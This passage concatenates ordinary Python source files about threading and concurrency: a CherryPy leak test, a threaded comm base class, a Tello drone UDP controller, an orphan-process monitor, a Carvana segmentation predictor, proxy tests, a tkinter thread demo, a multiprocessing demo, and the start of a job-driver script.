            lenresps = len(resps)
            if lenresps < 2:
                output.append("\nMissing Response reference. Should be 1 in "
                              "this request thread and 1 in the main thread.")
            elif lenresps > 2:
                output.append("\nToo many Response references (%r)." % lenresps)
                for resp in resps:
                    output.append("Referrers for %s:" % repr(resp))
                    for ref in gc.get_referrers(resp):
                        if ref is not resps:
                            output.append("    %s" % repr(ref))
            return "\n".join(output)
        gc_stats.exposed = True
    cherrypy.tree.mount(Root())
    cherrypy.config.update({'environment': 'test_suite'})
from cherrypy.test import helper
class ReferenceTests(helper.CPWebCase):
    """Checks that request handling does not leak thread-local references."""
    def test_threadlocal_garbage(self):
        """Hit / from many threads, then assert /gc_stats reports no leaks."""
        success = []
        def getpage():
            # Fetch / on a private connection; append to `success` only when
            # the response checks out (exceptions leave the list short).
            host = '%s:%s' % (self.interface(), self.PORT)
            if self.scheme == 'https':
                c = httplib.HTTPSConnection(host)
            else:
                c = httplib.HTTPConnection(host)
            try:
                c.putrequest('GET', '/')
                c.endheaders()
                response = c.getresponse()
                body = response.read()
                self.assertEqual(response.status, 200)
                self.assertEqual(body, "Hello world!")
            finally:
                c.close()
            success.append(True)
        ITERATIONS = 25
        ts = []
        for _ in range(ITERATIONS):
            t = threading.Thread(target=getpage)
            ts.append(t)
            t.start()
        for t in ts:
            t.join()
        self.assertEqual(len(success), ITERATIONS)
        # A clean run returns exactly "Statistics:" with no leak details.
        self.getPage("/gc_stats")
        self.assertBody("Statistics:")
if __name__ == '__main__':
    # Run standalone: mount the app and drive the suite via cherrypy's helper
    # with a small server socket queue.
    setup_server()
    helper.testmain({'server.socket_queue_size': 10})
|
common.py
|
import json
import threading
import logging
from qupy.comm import common
from qupy.interface import AbstractInterface
from qupy.framing import AbstractFraming
from qupy.framing.errors import FramingDecodeError
log = logging.getLogger(__name__)


def _identity_bytes(payload):
    # Normalizes bytes-like input (bytes/bytearray) to an immutable bytes object.
    return bytes(payload)


# Encoder/decoder pairs keyed by wire data format. Encoders produce bytes for
# transmission; decoders turn received bytes back into the native type.
_DATA_FORMAT_CONVERTERS = {
    'binary': {
        'decoder': _identity_bytes,
        'encoder': _identity_bytes,
    },
    'string': {
        'decoder': lambda raw: raw.decode('utf-8'),
        'encoder': lambda text: bytes(text, 'utf-8'),
    },
    'json': {
        'decoder': lambda raw: json.loads(raw.decode('utf-8')),
        'encoder': lambda obj: bytes(json.dumps(obj), 'utf-8'),
    },
}


def get_data_format_converter(data_format):
    """Return the {'decoder', 'encoder'} pair for *data_format*, or None if unknown."""
    return _DATA_FORMAT_CONVERTERS.get(data_format)
class CommBase:
    """Base class for threaded communication drivers.

    Pairs an AbstractInterface (raw transport) with an AbstractFraming
    (frame codec) and runs a worker loop on a daemon thread. Subclasses
    implement _worker(); it is expected to consult _is_stop() and return a
    truthy value to end the loop — see the lock hand-off notes below.
    """
    def __init__(self, interface: AbstractInterface, framing: AbstractFraming):
        self.interface = interface
        self.framing = framing
        # Guards _stop_flag and doubles as the stop-completion signal.
        self._stop_cond = threading.Condition()
        self._stop_flag = False
        self._thread = None
    def _before_worker_start(self):
        # Subclass hook; runs while _stop_cond is held, just before the
        # worker thread is started.
        pass
    def start(self):
        """Start the worker loop on a fresh daemon thread, clearing any prior stop request."""
        log.debug('Starting...')
        with self._stop_cond:
            self._stop_flag = False
            self._before_worker_start()
            self._thread = threading.Thread(target=self._worker_loop)
            self._thread.setDaemon(True)
            self._thread.start()
    def stop(self):
        """Request the worker to stop and block until it acknowledges.

        NOTE(review): wait() blocks indefinitely if the worker never observes
        the flag (e.g. stuck in blocking I/O) — confirm callers tolerate this.
        """
        if self._thread is None:
            log.warning('Already stopped')
            return
        log.debug('Stopping...')
        self._stop_cond.acquire()
        self._stop_flag = True
        # Released while waiting; re-acquired when the worker notifies.
        self._stop_cond.wait()
        self._stop_cond.release()
        self._thread = None
    def _send_to(self, tx_queue, message, **kwargs):
        """Encode *message* by its Python type (bytes/str/other→json) and enqueue it."""
        if isinstance(message, bytes):
            data_format = 'binary'
        elif isinstance(message, str):
            data_format = 'string'
        else:
            data_format = 'json'
        # `common` is this very module (self-import at the top of the file),
        # so this resolves to the module-level converter table.
        frame_bytes = common.get_data_format_converter(data_format).get('encoder')(message) if message is not None else None
        request = dict(message=frame_bytes, **kwargs)
        tx_queue.put(request)
    def _recv_from(self, rx_queue, data_format='binary'):
        """Dequeue one response; re-raise any transported error, else decode and return the message.

        Raises:
            TypeError: *data_format* has no registered converter.
        """
        response = rx_queue.get()
        error = response.get('error')
        if error:
            raise error
        frame_bytes = response.get('message')
        converter = common.get_data_format_converter(data_format)
        if not converter:
            raise TypeError('Unsupported data format')
        message = converter.get('decoder')(frame_bytes)
        return message
    def _is_stop(self):
        # CAUTION: on the True path this returns with _stop_cond STILL HELD —
        # _worker_loop relies on that to notify()/release() after the final
        # _worker() call. Only the False path releases here.
        self._stop_cond.acquire()
        if self._stop_flag:
            return True
        self._stop_cond.release()
        return False
    def _parse_rx_bytes(self, rx_bytes):
        """Feed bytes one at a time into the framing decoder; return the first
        complete message, or None if the buffer ends mid-frame."""
        message = None
        for byte in rx_bytes:
            try:
                message = self.framing.decode_frame(byte)
            except FramingDecodeError as e:
                log.warning(str(e))
            if message is not None:
                break
        return message
    def _worker(self):
        # One iteration of the communication loop; truthy return ends the loop.
        raise NotImplementedError('_worker method must be implemented')
    def _worker_loop(self):
        """Drive _worker() until it returns truthy, then hand the stop signal back."""
        log.debug('Started')
        while not self._worker():
            pass
        # The condition lock was left held by the _is_stop() call that
        # returned True; wake the thread blocked in stop() and release it.
        # NOTE(review): if _worker() returns truthy without having gone
        # through _is_stop(), notify() raises RuntimeError (lock not owned).
        self._stop_cond.notify()
        self._stop_cond.release()
        log.debug('Stopped')
|
TelloCommand.py
|
import time
import socket
from threading import Thread
"""
Class Description:
TelloCommand is a utility class to send commands to the Tello drone.
Public Attributes: None
Public Methods:
- start # start the drone communication
- stop # stop the drone communication
- send # send a command to the drone
- send_rc # send an RC command to the drone
"""
class TelloCommand:
    """Utility class that sends TelloSDK commands to a Tello drone over UDP.

    Public methods:
        start   -- begin drone communication (puts the drone in command mode)
        stop    -- stop the response-receiver thread
        send    -- send a discrete command and wait for the response
        send_rc -- send a rate-limited, fire-and-forget RC command
    """

    __debug = False              # Print debug output or not
    __IP = '192.168.10.1'        # IP address of the Tello Drone
    __PORT = 8889                # UDP port for drone commands
    __socket = None              # The socket connection with the drone
    __thread = None              # The thread object to control thread execution
    __thread_started = False     # Flag to determine if the thread is running
    __TIMEOUT = 10               # Time (seconds) to wait for a command response
    __COMM_DELAY = 0.1           # Minimum delay between each discrete command
    __RC_DELAY = 0.001           # Minimum delay between each RC command
    __last_command_time = 0      # Time when the last discrete command was issued
    __last_rc_command_time = 0   # Time when the last RC command was issued
    __current_response = None    # Most recent Tello response string (or None)

    def __init__(self, debug: bool=True):
        """Create the UDP socket and the (not yet started) receiver thread."""
        self.__debug = debug
        # Open local UDP port for Tello communication
        self.__socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.__socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.__socket.bind(('', self.__PORT))
        # Bind the thread to receive responses from the drone
        self.__thread = Thread(target=self.__thread_function, daemon=True)

    def __del__(self):
        # Only close the socket here, because sockets are not thread safe.
        self.__socket.close()

    def __thread_function(self):
        """Continuously read drone responses into self.__current_response."""
        while self.__thread_started:
            try:
                response, ip = self.__socket.recvfrom(1024)
                if self.__debug:
                    print('[TelloCommand]: {}'.format(response))
                self.__current_response = response.decode("utf-8").rstrip("\r\n")
            except (UnicodeDecodeError, socket.error) as err:
                print('[TelloCommand] Error: {}'.format(err))

    def start(self):
        """Begin drone communication; raises if the drone does not answer 'ok'."""
        # Start the receive thread
        self.__thread_started = True
        self.__thread.start()
        # Set drone in command mode
        if self.send('command') != "ok":
            raise Exception('[TelloCommand] Failed to connect to the Tello drone.')

    def stop(self):
        """Stop drone communication (receiver thread exits on its next loop)."""
        self.__thread_started = False

    def send(self, command: str):
        """Send a TelloSDK command string.

        Returns the lower-cased response string, or None if the drone did
        not answer within __TIMEOUT seconds.
        """
        # Wait out the REMAINDER of the __COMM_DELAY window between commands.
        # BUGFIX: previously this slept the time already elapsed instead of
        # the time remaining, so the inter-command spacing was not enforced.
        elapsed = time.time() - self.__last_command_time
        if elapsed < self.__COMM_DELAY:
            time.sleep(self.__COMM_DELAY - elapsed)
        # Reset the current response and send the command to the drone over the socket
        self.__current_response = None
        self.__socket.sendto(command.encode('utf-8'), (self.__IP,self.__PORT))
        if self.__debug is True:
            print('[TelloCommand] Command Sent: {}'.format(command))
        # Every 0.1s, check whether the response was received (in the thread function)
        timestamp = time.time()
        while not self.__current_response:
            if time.time() - timestamp > self.__TIMEOUT:
                print('[TelloCommand] Timeout. Aborting Command: \'{}\'.'.format(command))
                return None
            time.sleep(0.1)
        # Log the last successful command time
        self.__last_command_time = time.time()
        # Return the response string
        if self.__debug is True:
            print('[TelloCommand] Response Received: {}'.format(self.__current_response))
        return self.__current_response.lower()

    def send_rc(self, v_lr: int, v_fb: int, v_ud: int, v_yaw: int):
        """Send an RC velocity command (left/right, front/back, up/down, yaw).

        Values are clamped to [-100, 100] as required by the Tello SDK.
        Fire-and-forget: no response is awaited. Returns None.
        """
        # Only send if enough time between commands has elapsed
        if time.time() - self.__last_rc_command_time < self.__RC_DELAY:
            return
        # Clamp the values between -100 to 100 (required by the Tello SDK)
        clamp100 = lambda x : max(-100, min(100, x))
        v_lr = clamp100(v_lr)
        v_fb = clamp100(v_fb)
        v_ud = clamp100(v_ud)
        v_yaw = clamp100(v_yaw)
        # Send the command to the drone via the socket
        command = 'rc {} {} {} {}'.format(v_lr, v_fb, v_ud, v_yaw)
        self.__socket.sendto(command.encode('utf-8'), (self.__IP,self.__PORT))
        # BUGFIX: record the send time so the __RC_DELAY rate limit above
        # actually engages (previously this timestamp was never updated).
        self.__last_rc_command_time = time.time()
        if self.__debug is True:
            print('[TelloCommand] RC Command Sent: {}'.format(command))
|
orphan_process_monitor.py
|
from builtins import object
import os
import threading
import time
import traceback
from ..splunktalib.common import log
class OrphanProcessChecker(object):
    """Detect whether this process has been orphaned (re-parented).

    Only meaningful on Linux; on Windows (os.name == "nt") is_orphan()
    always reports False.
    """

    def __init__(self, callback=None):
        # Remember the parent PID at construction time; a later mismatch
        # means our original parent has died.
        self._ppid = 0 if os.name == "nt" else os.getppid()
        self._callback = callback

    def is_orphan(self):
        """Return True when the recorded parent PID no longer matches."""
        if os.name == "nt":
            return False
        orphaned = os.getppid() != self._ppid
        if orphaned:
            log.logger.warn("Process=%s has become orphan", os.getpid())
        return orphaned

    def check_orphan(self):
        """Like is_orphan(), additionally firing the callback when orphaned."""
        orphaned = self.is_orphan()
        if orphaned and self._callback:
            self._callback()
        return orphaned
class OrphanProcessMonitor(object):
    """Poll for orphanhood once per second on a daemon thread; fire the
    callback (via the checker) and exit the thread when it happens."""

    def __init__(self, callback):
        self._checker = OrphanProcessChecker(callback)
        self._thr = threading.Thread(target=self._do_monitor)
        self._thr.daemon = True
        self._started = False

    def start(self):
        """Start the polling thread (idempotent)."""
        if self._started:
            return
        self._started = True
        self._thr.start()

    def stop(self):
        # The polling loop observes this flag on its next iteration.
        self._started = False

    def _do_monitor(self):
        while self._started:
            try:
                if self._checker.check_orphan():
                    break
                time.sleep(1)
            except Exception:
                log.logger.error("Failed to monitor orphan process, reason=%s",
                                 traceback.format_exc())
|
val_submit.py
|
import cv2
import numpy as np
import pandas as pd
import threading
import Queue
import tensorflow as tf
from tensorflow.python.client import device_lib
from tqdm import tqdm
import params
import os
# NOTE: Python 2 script (print statement, Queue module, xrange in the
# commented block below).
input_size = params.input_size
batch_size = params.test_batch_size
orig_width = params.orig_width
orig_height = params.orig_height
threshold = params.threshold
model_factory = params.model_factory
# phase and percentage config: getPoint derives the resize target and the
# crop window (rows rmin:rmax, cols cmin:cmax) for this phase.
PHASE = 0
PERCENT = 1.05
new_height, new_width, rmin, rmax, cmin, cmax = params.getPoint(PERCENT, PHASE)
print new_height, new_width, rmin, rmax, cmin, cmax
# gpu setting: restrict to one physical GPU, then enumerate visible devices.
gpu_id = '1'
os.environ['CUDA_VISIBLE_DEVICES']=str(gpu_id)
gpus = [x.name for x in device_lib.list_local_devices() if x.name[:4] == '/gpu']
# path setting
DATA_PATH = '/media/Disk/yanpengxiang/dataset/carvana/'
SAVE_PATH = '/media/Disk/yanpengxiang/Unet/output/val' + str(int(PERCENT * 100)) + '/'
if os.path.isdir(SAVE_PATH) == False:
    os.makedirs(SAVE_PATH)
# Image ids come from the train-masks CSV (validation over training images).
df_test = pd.read_csv('/media/Disk/yanpengxiang/dataset/carvana/train_masks.csv')
ids_test = np.array(df_test['img'].map(lambda s: s.split('.')[0]).values)
## read txt ##
# test_list = open('list/test_hard.txt')
# df_test = test_list.readlines()
# ids_test = []
# for i in xrange(len(df_test)):
#     ids_test.append(df_test[i][:15])
# ids_test = np.array(ids_test)
names = []
rles = []
q_size = 10  # bounded queue depth between loader and predictor threads
for id in ids_test:
    names.append('{}.jpg'.format(id))
# https://www.kaggle.com/stainsby/fast-tested-rle
def run_length_encode(mask):
    """Run-length encode a binary mask (1 = mask, 0 = background).

    Returns space-separated "start length" pairs with 1-indexed pixel
    positions over the flattened mask. Assumes the flattened mask begins
    and ends with background, per the original Kaggle fast-RLE recipe.
    """
    flat = mask.flatten()
    # Positions where the value changes, shifted to 1-indexed run starts.
    change_points = np.where(flat[1:] != flat[:-1])[0] + 2
    # Convert every second entry (a run end) into a run length in place.
    change_points[1::2] = change_points[1::2] - change_points[:-1:2]
    return ' '.join(str(v) for v in change_points)
def create_model(gpu):
    """Build the segmentation model on TF device *gpu* and load the
    pre-trained weights snapshot."""
    with tf.device(gpu):
        model = model_factory()
        model.load_weights(filepath='weights/save/acc09969.hdf5')
    return model
def data_loader(q, ):
    """Producer thread: read, resize and crop test images in batches and
    push (ids_batch, float32 image batch scaled to [0,1]) tuples onto *q*.

    Pushes one (None, None) sentinel per GPU consumer when finished.
    """
    for start in tqdm(range(0, len(ids_test), batch_size)):
        x_batch = []
        end = min(start + batch_size, len(ids_test))
        ids_test_batch = ids_test[start:end]
        for id in ids_test_batch:
            img = cv2.imread((DATA_PATH+'train/{}.jpg').format(id))
            if input_size is not None:
                # Downscale first if needed, then crop to the ROI computed
                # by params.getPoint for this PHASE/PERCENT.
                if new_width != orig_width:
                    img = cv2.resize(img, (new_width, new_height))
                img = img[rmin:rmax, cmin:cmax]
            x_batch.append(img)
        x_batch = np.array(x_batch, np.float32) / 255
        q.put((ids_test_batch, x_batch))
    # One end-of-stream marker per predictor thread.
    for g in gpus:
        q.put((None, None))
def predictor(q, gpu):
    """Consumer thread: pull (ids, batch) tuples from *q*, run the model on
    *gpu*, and write each predicted mask to SAVE_PATH.

    Exits on the (None, None) sentinel pushed by data_loader.
    """
    PHASE_CHAR = str(PHASE)
    config = tf.ConfigProto()
    config.allow_soft_placement=True
    config.gpu_options.allow_growth=True
    sess = tf.Session(config=config)
    with sess.as_default():
        model = create_model(gpu)
        while True:
            ids, x_batch = q.get()
            if ids is None:
                break
            preds = model.predict_on_batch(x_batch)
            # Drop the trailing channel axis: (B, H, W, 1) -> (B, H, W).
            preds = np.squeeze(preds, axis=3)
            for i,pred in enumerate(preds):
                if input_size is not None:
                    prob = pred
                    #mask = np.zeros_like(prob)
                    #mask[prob>threshold] = 255
                    # Save the soft (un-thresholded) probability mask, 0-255.
                    mask = prob * 255
                    id = ids[i]
                    cv2.imwrite(SAVE_PATH + id + '_mask_' + PHASE_CHAR + '.png', mask)
print('Predicting on {} samples with batch_size = {}...'.format(len(ids_test), batch_size))
# One bounded queue feeds a single loader thread into one predictor thread
# per visible GPU.
q = Queue.Queue(maxsize=q_size)
threads = []
threads.append(threading.Thread(target=data_loader, name='DataLoader', args=(q,)))
threads[0].start()
for gpu in gpus:
    print("Starting predictor at device " + gpu)
    t = threading.Thread(target=predictor, name='Predictor', args=(q, gpu))
    threads.append(t)
    t.start()
# Wait for all threads to finish
for t in threads:
    t.join()
#print("Generating submission file...")
#df = pd.DataFrame(rles, columns=['img', 'rle_mask'])
#df['img'] += '.jpg'
#df.to_csv('submit/submission.csv.gz', index=False, compression='gzip')
|
test_proxy.py
|
# -*- coding: utf8 -*-
# Copyright (c) 2019 Niklas Rosenstein
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import threading
from collections import abc
from nr.proxy import *
import pytest
def test_proxy():
    """Characterize default proxy() behavior around a None target."""
    p = proxy(lambda: None)
    assert p == None
    # An unfortunate behavior, that is why we have the #make_cls()
    # function (see #test_proxy_iterable() below).
    assert isinstance(p, abc.Iterable)
    # TODO(NiklasRosenstein): Why does it not behave like abc.Iterable?
    assert not isinstance(p, abc.Mapping)
def test_proxy_iterable():
    """make_cls(exclude=['__iter__']) must produce proxies that are not Iterable."""
    NonIterableProxy = make_cls('NonIterableProxy', exclude=['__iter__'])
    print(NonIterableProxy)
    print(NonIterableProxy.__bases__)
    p = NonIterableProxy(lambda: None)
    assert p == None
    assert not hasattr(p, '__iter__')
    assert not hasattr(NonIterableProxy, '__iter__')
    assert not isinstance(p, abc.Mapping)
    assert not isinstance(p, abc.Iterable), NonIterableProxy.__mro__
    # Lazy variant: the factory runs once on first access, result is cached.
    NonIterableLazyProxy = make_cls('NonIterableLazyProxy', exclude=['__iter__'])
    def _func():
        # `count` is a closure over the local defined below; this works only
        # because the lazy proxy defers the call until after the assignment.
        count[0] += 1
        return count[0]
    p = NonIterableLazyProxy(_func, lazy=True)
    count = [0]
    assert p == 1
    assert p == 1
    assert p == 1
    assert not hasattr(p, '__iter__')
    assert not hasattr(NonIterableProxy, '__iter__')
    assert not isinstance(p, abc.Mapping)
    assert not isinstance(p, abc.Iterable), NonIterableProxy.__mro__
def test_proxy_auto_increment():
    """A non-lazy proxy re-invokes its factory on every access."""
    count = [0]
    def auto_increment_():
        count[0] += 1
        return count[0]
    auto_increment = proxy(auto_increment_)
    assert auto_increment == 1
    assert auto_increment == 2
    assert auto_increment + 10 == 13
    assert count[0] == 3
def test_proxy_lazy_not_auto_increment():
    """A lazy proxy invokes its factory exactly once and caches the result."""
    count = [0]
    def auto_increment_():
        count[0] += 1
        return count[0]
    auto_increment = proxy(auto_increment_, lazy=True)
    assert auto_increment == 1
    assert auto_increment == 1
    assert auto_increment == 1
    assert count[0] == 1
def test_threadlocal():
    """Each thread sees an independent threadlocal stack (push/get/pop/empty)."""
    l = threadlocal[int]()
    sink = set()
    lock = threading.Lock()
    def _run(value: int):
        # Repeated push/pop with a thread-unique value: any cross-thread
        # leakage would trip the empty()/get() assertions.
        for i in range(1000):
            assert empty(l)
            push(l, value)
            assert not empty(l)
            assert get(l) == value
            assert pop(l) == value
            assert empty(l)
        with lock:
            sink.add(value)
    threads = [
        threading.Thread(target=lambda: _run(99)),
        threading.Thread(target=lambda: _run(10)),
        threading.Thread(target=lambda: _run(321)),
    ]
    [t.start() for t in threads]
    _run(42)  # main thread participates too
    [t.join() for t in threads]
    assert sink == set([99, 10, 321, 42])
|
threads-demoAll-frm.py
|
"""
FAILS! -- tkinter doesn't support parallel GUI updates in threads
"""
import _thread, threading
from tkinter import *
from quitter import Quitter
demoModules = ['demoDlg', 'demoCheck', 'demoRadio', 'demoScale']
parts = []
def addComponents(root):
    """Attach every demo module to *root*, each built in its own thread.

    NOTE: this is the deliberately-broken variant (see module docstring) --
    tkinter widgets must be created from the GUI thread, so building them
    in _thread workers fails.
    """
    for demo in demoModules:
        module = __import__(demo)
        _thread.start_new_thread(build, (module,))
        #threading.Thread(target=build, args=(module,)).start()
        #build(module)
def build(module):
    """Instantiate one demo module's Demo frame and pack it into root."""
    #module = __import__(demo) # this has no effect
    part = module.Demo(root) # attach an instance
    part.config(bd=2, relief=GROOVE) # or pass configs to Demo()
    part.pack(side=LEFT, expand=YES, fill=BOTH) # grow, stretch with window
    parts.append(part) # change list in-place
def dumpState():
    """Print each attached part's report, or 'none' if it has no report()."""
    for part in parts:
        print(part.__module__ + ':', end=' ')
        if not hasattr(part, 'report'):
            print('none')
        else:
            part.report()
# Build the window on the main thread; component frames are (incorrectly)
# attached from worker threads by addComponents.
root = Tk() # make explicit root first
root.title('Frames')
Label(root, text='Multiple Frame demo', bg='white').pack()
Button(root, text='States', command=dumpState).pack(fill=X)
Quitter(root).pack(fill=X)
addComponents(root)
root.mainloop()
|
manager.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import multiprocessing
import time
# Whenever the event to be passed is set, print the dict d
def watch(d,evt):
    """Loop forever: wait for *evt*, print the managed dict *d*, clear *evt*.

    NOTE: Python 2 code (print statement).
    """
    while True:
        evt.wait()
        print d
        evt.clear()
if __name__ == '__main__':
    m = multiprocessing.Manager()
    d = m.dict()
    evt = m.Event()
    # Start the process that watches the shared dict
    p = multiprocessing.Process(target=watch,args=(d,evt))
    p.daemon = True
    p.start()
    # Update the dict and notify the watcher
    d['foo'] = 42
    evt.set()
    time.sleep(5)
    d['bar'] = 'hello'
    evt.set()
    time.sleep(5)
    # Terminate the watcher process and shut down the manager
    p.terminate()
    m.shutdown()
|
chauffeur.py
|
#!/usr/bin/env python3
## Copyright 2017 Timothy A. Handy
##
## Permission is hereby granted, free of charge, to any person obtaining
## a copy of this software and associated documentation files (the "Software"),
## to deal in the Software without restriction, including without limitation
## the rights to use, copy, modify, merge, publish, distribute, sublicense,
## and/or sell copies of the Software, and to permit persons to whom the
## Software is furnished to do so, subject to the following conditions:
##
## The above copyright notice and this permission notice shall be included
## in all copies or substantial portions of the Software.
##
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
## OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
## OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
## SOFTWARE.
import sys
from pathlib import Path
import os
import time
import queue
import threading
import shutil
import subprocess
import yaml
import pyaml
import itertools as it
from collections import OrderedDict
import logging
import argparse
from math import sqrt, pow
# Global configuration options
driverData = dict()      # driver-section settings (defaults + YAML overrides)
userData = dict()        # free-form user-defined substitution values
runData = OrderedDict()  # per-run variable/parameter sections, sorted by key
fileData = OrderedDict() # per-file template-processing sections
fmtShort = dict()        # type -> short format spec (see initDriverData)
fmtLong = dict()         # type -> long format spec (used for file contents)
pbsRundirs = []          # NOTE(review): appears unused in this file chunk
pbsFiles = []            # generated PBS scripts, referenced by the submit script
wetRun = True            # False => dry run; derived in initDriverData
# Create logger and setup to go to stdout. This allows us
# to redirect the log output via > in the command line
logger = logging.getLogger(__name__)
out_hdlr = logging.StreamHandler(sys.stdout)
out_hdlr.setFormatter(logging.Formatter('[%(asctime)s t-%(threadName)s] %(levelname)s: %(message)s',
                                        datefmt='%m/%d/%Y %H:%M:%S'))
out_hdlr.setLevel(logging.INFO)
logger.addHandler(out_hdlr)
logger.setLevel(logging.INFO)
#============================================
# abort: Helper function to abort execution
#============================================
def abort(msg):
    """Log *msg* as critical, prefixed with the calling function's name,
    and terminate the program."""
    caller = sys._getframe(1).f_code.co_name
    logger.critical('['+caller+'] '+msg)
    sys.exit(1)
def logInfo(msg):
    """Wrapper for the information-level logger."""
    logger.info(msg)
#===============================================
# resolveAbsPath: Convert paths to absolute
#===============================================
def resolveAbsPath(pathIn):
    """Expand '~' and resolve *pathIn* to a normalized absolute path.

    Returns None when given None. Relative paths are anchored at the
    current working directory.
    """
    if pathIn is None:
        return None
    expanded = pathIn.replace('~', os.path.expanduser('~'))
    if not os.path.isabs(expanded):
        expanded = os.path.join(os.getcwd(), expanded)
    return os.path.normpath(expanded)
#============================================
# printCfg: Helper function to print configuration
#============================================
def printCfg():
    """Pretty print the current state's YAML configuration to stdout."""
    cfg = dict()
    cfg['driver'] = driverData
    cfg['userdef'] = userData
    # Each run section is re-emitted under its own top-level key.
    for key in runData:
        cfg[key] = runData[key]
    yaml.safe_dump(cfg,sys.stdout, default_flow_style=False)
#============================================
# getThreadInfo: Helper function to get thread information
#============================================
def getThreadInfo():
    """Return a dict of current-thread metadata (key 'thread': thread name),
    used by interpolateString to resolve %(thread) parameters."""
    info = dict()
    # Thread.getName() is a deprecated alias; use the .name attribute.
    info['thread'] = threading.current_thread().name
    return info
#============================================
# initDriverData: Initialize driver control
# data with defaults and then overwrite with
# config-defined values
#============================================
def initDriverData(cfg):
    """Initialize and extract driver parameters from the YAML configuration.

    Fills the module-level driverData dict with defaults, overlays keys from
    cfg['driver'] (unknown keys abort), wires the type->format maps, and
    derives the module-level wetRun flag.
    """
    # BUGFIX: without this declaration, the assignment at the bottom bound a
    # function-local wetRun and the module-level flag never changed, so dry
    # runs were impossible to disable via the config.
    global wetRun
    # Defaults
    driverData['cwd'] = os.getcwd()
    driverData['scriptdir'] = os.path.realpath(__file__)
    driverData['executable'] = None
    driverData['rundir'] = '%(cwd)'
    driverData['templatedir'] = None
    driverData['type'] = 'exec'
    driverData['dryrun'] = True
    driverData['skipifexist'] = True
    driverData['nthreads'] = 1
    driverData['precommand'] = None
    driverData['execcommand'] = None
    driverData['postcommand'] = None
    # PBS stuff
    driverData['pbs_submitscript'] = '%(cwd)/pbs_submit.sh'
    driverData['pbs_subcommand'] = 'qsub'
    # Type formats
    driverData['intFmtLong'] = 'd'
    driverData['fltFmtLong'] = '12.7e'
    driverData['intFmtShort'] = '05d'
    driverData['fltFmtShort'] = 'f'
    # Load user-defined values; unknown keys are a fatal config error.
    cfgKey = 'driver'
    if(cfgKey in cfg):
        for key in cfg[cfgKey]:
            if(key.lower() not in driverData):
                abort('Key "'+key+'" not accepted. Options are: '+', '.join(driverData.keys()))
            driverData[key.lower()] = cfg[cfgKey][key]
    # Setup type -> format mappings
    fmtLong[type(1)] = driverData['intFmtLong']
    fmtLong[type(1.0)] = driverData['fltFmtLong']
    fmtShort[type(1)] = driverData['intFmtShort']
    fmtShort[type(1.0)] = driverData['fltFmtShort']
    # Setup non-dict globals
    wetRun = not driverData['dryrun']
#============================================
# initUserData: Initialize custom user-defined
# data
#============================================
def initUserData(cfg):
    """Copy cfg['userdef'] entries into the module-level userData dict,
    lower-casing every key."""
    if 'userdef' in cfg:
        for key, value in cfg['userdef'].items():
            userData[key.lower()] = value
#============================================
# initRunData: Initialize relevant run data
# This performs the following:
# 1) Searches for all top-level keys containing 'run'
# 2) Sorts them lexicographically
#============================================
def initRunData(cfg):
    """Extract 'run' parameters from the YAML configuration.

    Finds every top-level key containing 'run', sorts them
    lexicographically, validates/derives each section's 'variableorder',
    normalizes scalar variable values to lists, and stores the sections in
    the module-level runData dict (keys lower-cased).
    """
    # Extract all top-level keys containing 'run'
    keyList = [key for key in cfg if 'run' in key.lower()]
    if(not keyList):
        abort('No run sections declared!')
    # Sort the list
    keyList = sorted(keyList)
    # NOTE(review): restrNames is never used below — dead code?
    restrNames = ['variableorder']
    # Read in the individual run data
    for key in keyList:
        rdata = cfg[key]
        varSet = {v for v in rdata['variables']}
        # Construct the variableorder field if necessary
        if('variableorder' not in rdata):
            rdata['variableorder'] = list(varSet)
        else:
            # Confirm that all expected variable data is in the 'variableorder' field
            if(not varSet == set(rdata['variableorder'])):
                abort('Provided variable order and parsed variables are not the same')
        # Ensure that all variable values are lists
        # If they're not (e.g. a single int is the variable value),
        # convert them to a single-element list
        for v in rdata['variables']:
            if(type(rdata['variables'][v]) is not list):
                rdata['variables'][v] = [rdata['variables'][v]]
        # Store run data
        runData[key.lower()] = rdata
#============================================
# initFileData: Initialize relevant data about
# files that need to be processed.
#============================================
def initFileData(cfg):
    """Extract 'file' parameters from the YAML configuration.

    Finds every top-level key containing 'file', validates each section
    against the accepted keys (input/output/type/parameters), and stores it
    in the module-level fileData dict. Missing file sections are allowed.
    """
    # Extract all top-level keys containing 'file'
    keyList = [key for key in cfg if 'file' in key.lower()]
    if(not keyList):
        # File sections are optional, unlike run sections.
        # abort('No file sections declared!')
        return
    # Sort the list
    keyList = sorted(keyList)
    # Read in the individual file data
    for key in keyList:
        # Set defaults
        rdata = dict()
        rdata['input'] = None
        rdata['output'] = None
        rdata['type'] = None
        rdata['parameters'] = None
        cdata = cfg[key]
        for k in cdata.keys():
            if(k.lower() not in rdata.keys()):
                abort('File key "'+k+'" not accepted. Options are: '+', '.join(rdata.keys()))
            rdata[k.lower()] = cdata[k]
        # Store file data
